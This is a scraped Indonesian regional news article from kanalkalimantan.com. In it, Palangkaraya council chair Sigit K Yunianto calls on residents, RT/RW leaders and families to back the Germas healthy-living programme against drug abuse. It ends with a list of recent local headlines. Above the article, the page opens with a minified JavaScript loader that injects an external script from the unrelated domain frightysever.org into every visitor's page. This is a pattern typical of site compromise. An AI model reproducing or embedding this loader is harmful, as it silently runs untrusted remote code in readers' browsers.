(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD Kota Palangka Raya

Ketua DPRD Ajak Masyarakat Wujudkan Palangkaraya Bebas Narkoba


KANALKALIMANTAN.COM, PALANGKARAYA– Ketua DPRD Kota Palangkaraya, Sigit K Yunianto mengajak seluruh lapisan masyarakat, peka terhadap penyalahgunaan narkoba, terutama di lingkungan sekitar. Hal ini terkait sejumlah kasus narkoba belakangan yang menimbulkan keprihatinan.

Pemerintah hanya mengingatkan dan mensosialisasikan penerapan Gerakan Masyarakat Hidup Sehat (Germas), terutama dalam upaya pencegahan dan pemberantasan narkotika di Kota Palangkaraya bersama masyarakat.

Selain aparat penegak hukum, masyarakat juga memiliki peranan penting, dalam memberantas narkoba, karena, tanggung jawab moral untuk memberantas dan menekan peredaran narkoba, juga menjadi perhatian bersama.

“Saya harap masyarakat dapat turut serta secara aktif, membantu menyukseskan program Germas dan jangan sampai masyarakat membiarkan itu semakin masif beredar,” kata Sigit kepada Kanalkalimantan.com, belum lama tadi.

 

Baca juga  : Lanjutan Bimtek Inovasi, Bappedalitbang Banjar Gelar Drum Up dan Diagnose

Menurutnya, Germas itu sendiri merupakan sebuah program terencana, yang dilakukan secara bersama-sama oleh semua komponen masyarakat, dengan kesadaran, kemauan, dan kemampuan berperilaku sehat dalam rangka meningkatkan kualitas hidupnya.

Pelaksanaan Germas harus dimulai dari diri sendiri dan keluarga, sehingga, nantinya diharapkan generasi muda dan masyarakat, dapat berperilaku hidup sehat, tanpa narkoba. Kondisi tersebut akan meminalisir dan menghindari penyalahgunaan narkoba di masyarakat.

“Oleh sebab itu, kami meminta agar peran rt dan RW sebagai ujung tombak, sekaligus kepanjangan tangan pemerintah, hendaknya dapat mengoptimalkan pengawasan di lingkungan sekitarnya,” ujarnya.

Selain Itu dapat mengoptimalkan pengawasan ke lingkungan sekitarnya, sekaligus menjadi benteng, dalam menekan peredaran narkoba di masyarakat. Kepedulian bersama, hendaknya dimulai dari lingkungan keluarga, masyarakat dan sekitarnya.

 

Baca juga  : Satgas Pangan Tanbu Jamin Stok Bahan Kebutuhan Pokok Aman Selama Ramadhan

Pemberantasan, penyalahgunaan dan peredaran narkoba dibutuhkan adanya sinergitas antar pihak, baik pemerintah maupun instansi vertikal dengan melibatkan peran masyarakat untuk merumuskan kebijakan dalam rangka memberantas peredaran narkoba.

“Saya mengajak bersama-sama, membulatkan tekad dalam mewujudkan Palangkaraya yang maju dan bebas dari narkoba serta membudayakan hidup sehat agar tidak mudah terjerumus pada hal-hal negatif,” pungkasnya. (kanalkalimantan.com/Tri)

Reporter : tri
Editor : cell


Desy Arfianty

Recent Posts

Begini Penjelasan Disporabudpar Banjarbaru Soal Perizinan Hotel Aeris

KANALKALIMANTAN.COM, BANJARBARU – Sebuah hotel baru di ruas Jalan Panglima Batur Banjarbaru akan melakukan soft… Read More

4 jam ago

Gerilya Politik Lisa Halaby ke Nasdem Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Langkah politik Erna Lisa Halaby mencari partai politik pengusung dalam Pemilihan Wali… Read More

4 jam ago

Tim Wasev Cek Langsung Lokasi TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana bersama Tim Pengawas… Read More

4 jam ago

Lutung Tersengat Listrik Dievakuasi Warga, Damkar HSU Amankan Satwa Dilindungi

KANALKALIMANTAN.COM, AMUNTAI - Tersengat aliran listrik bertegangan tinggi, seekor satwa dilindungi lutung terkapar berhasil dievakuasi… Read More

5 jam ago

“Pesta Siswa Literasi Digital” di Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - Teknologi yang saat ini berkembang sangat pesat dan cepat telah membuat perubahan… Read More

6 jam ago

Kontestasi Pilwali Banjarbaru, Golkar Partai Pertama Incaran Lisa Halaby

Lisa Halaby: Saya Siap, Insyaallah Mundur Sebagai ASN Read More

6 jam ago

This website uses cookies.